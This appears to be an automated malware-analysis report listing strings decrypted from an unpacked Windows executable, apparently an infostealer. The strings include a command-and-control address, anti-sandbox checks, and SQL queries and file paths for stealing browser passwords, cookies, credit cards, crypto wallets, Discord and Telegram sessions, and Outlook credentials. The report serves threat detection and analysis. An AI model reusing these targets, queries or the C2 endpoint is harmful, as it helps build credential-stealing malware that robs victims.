Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: CryptStringToBinaryA
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: sscanf
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: VMwareVMware
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: HAL9TH
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: JohnDoe
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: DISPLAY
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: %hu/%hu/%hu
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: http://185.215.113.206
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: /c4becf79229cb002.php
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: /68b591d6548ec281/
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: stok
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: GetEnvironmentVariableA
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: GetFileAttributesA
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: HeapFree
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: GetFileSize
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: GlobalSize
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: CreateToolhelp32Snapshot
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: IsWow64Process
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: Process32Next
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: GetLocalTime
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: FreeLibrary
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: GetTimeZoneInformation
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: GetSystemPowerStatus
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, String decryptor: GetVolumeInformationA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetWindowsDirectoryA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Process32First
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetLocaleInfoA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetUserDefaultLocaleName
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetModuleFileNameA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: DeleteFileA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: FindNextFileA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: LocalFree
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: FindClose
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SetEnvironmentVariableA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: LocalAlloc
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetFileSizeEx
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: ReadFile
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SetFilePointer
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: WriteFile
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CreateFileA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: FindFirstFileA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CopyFileA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: VirtualProtect
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetLastError
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: lstrcpynA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: MultiByteToWideChar
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GlobalFree
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: WideCharToMultiByte
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GlobalAlloc
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: OpenProcess
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: TerminateProcess
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetCurrentProcessId
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: gdiplus.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: ole32.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: bcrypt.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: wininet.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: shlwapi.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: shell32.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: rstrtmgr.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CreateCompatibleBitmap
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SelectObject
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: BitBlt
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: DeleteObject
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CreateCompatibleDC
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GdipGetImageEncodersSize
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GdipGetImageEncoders
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GdiplusStartup
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GdiplusShutdown
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GdipSaveImageToStream
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GdipDisposeImage
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GdipFree
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetHGlobalFromStream
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CreateStreamOnHGlobal
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CoUninitialize
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CoInitialize
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CoCreateInstance
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: BCryptGenerateSymmetricKey
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: BCryptCloseAlgorithmProvider
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: BCryptDecrypt
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: BCryptSetProperty
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: BCryptDestroyKey
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: BCryptOpenAlgorithmProvider
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetWindowRect
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetDesktopWindow
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetDC
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CloseWindow
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: wsprintfA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: EnumDisplayDevicesA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetKeyboardLayoutList
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CharToOemW
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: wsprintfW
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: RegQueryValueExA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: RegEnumKeyExA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: RegOpenKeyExA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: RegCloseKey
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: RegEnumValueA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CryptBinaryToStringA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CryptUnprotectData
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SHGetFolderPathA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: ShellExecuteExA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: InternetOpenUrlA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: InternetConnectA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: InternetCloseHandle
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: HttpSendRequestA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: HttpOpenRequestA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: InternetReadFile
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: InternetCrackUrlA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: StrCmpCA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: StrStrA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: StrCmpCW
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: PathMatchSpecA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetModuleFileNameExA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: RmStartSession
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: RmRegisterResources
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: RmGetList
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: RmEndSession
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: sqlite3_open
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: sqlite3_prepare_v2
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: sqlite3_step
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: sqlite3_column_text
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: sqlite3_finalize
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: sqlite3_close
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: sqlite3_column_bytes
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: sqlite3_column_blob
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: encrypted_key
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: PATH
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: C:\ProgramData\nss3.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: NSS_Init
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: NSS_Shutdown
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: PK11_GetInternalKeySlot
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: PK11_FreeSlot
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: PK11_Authenticate
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: PK11SDR_Decrypt
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: C:\ProgramData\
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: browser:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: profile:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: url:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: login:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: password:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Opera
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: OperaGX
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Network
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: cookies
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: .txt
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: TRUE
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: FALSE
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: autofill
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: history
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: cc
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: name:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: month:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: year:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: card:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Cookies
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Login Data
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Web Data
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: History
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: logins.json
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: formSubmitURL
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: usernameField
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: encryptedUsername
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: encryptedPassword
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: guid
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: cookies.sqlite
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: formhistory.sqlite
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: places.sqlite
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: plugins
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Local Extension Settings
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Sync Extension Settings
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: IndexedDB
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Opera Stable
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Opera GX Stable
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CURRENT
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: chrome-extension_
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: _0.indexeddb.leveldb
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Local State
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: profiles.ini
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: chrome
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: opera
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: firefox
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: wallets
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: %08lX%04lX%lu
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: ProductName
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: x32
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: x64
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: %d/%d/%d %d:%d:%d
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: DisplayName
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: DisplayVersion
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Network Info:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - IP: IP?
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - Country: ISO?
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: System Summary:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - HWID:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - OS:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - Architecture:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - UserName:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - Computer Name:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - Local Time:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - UTC:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - Language:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - Keyboards:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - Laptop:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - Running Path:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - CPU:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - Threads:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - Cores:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - RAM:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - Display Resolution:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - GPU:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: User Agents:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Installed Apps:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: All Users:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Current User:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Process List:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: system_info.txt
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: freebl3.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: mozglue.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: msvcp140.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: nss3.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: softokn3.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: vcruntime140.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: \Temp\
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: .exe
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: runas
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: open
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: /c start
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: %DESKTOP%
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: %APPDATA%
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: %LOCALAPPDATA%
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: %USERPROFILE%
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: %DOCUMENTS%
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: %PROGRAMFILES_86%
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: %RECENT%
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: *.lnk
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: files
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: \discord\
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: \Local Storage\leveldb\CURRENT
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: \Local Storage\leveldb
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: \Telegram Desktop\
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: key_datas
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: D877F783D5D3EF8C*
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: map*
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: A7FDF864FBC10B77*
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: A92DAA6EA6F891F2*
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: F8806DD0C461824F*
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: Telegram
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: Tox
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: *.tox
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: *.ini
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: Password
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack String decryptor: 00000001
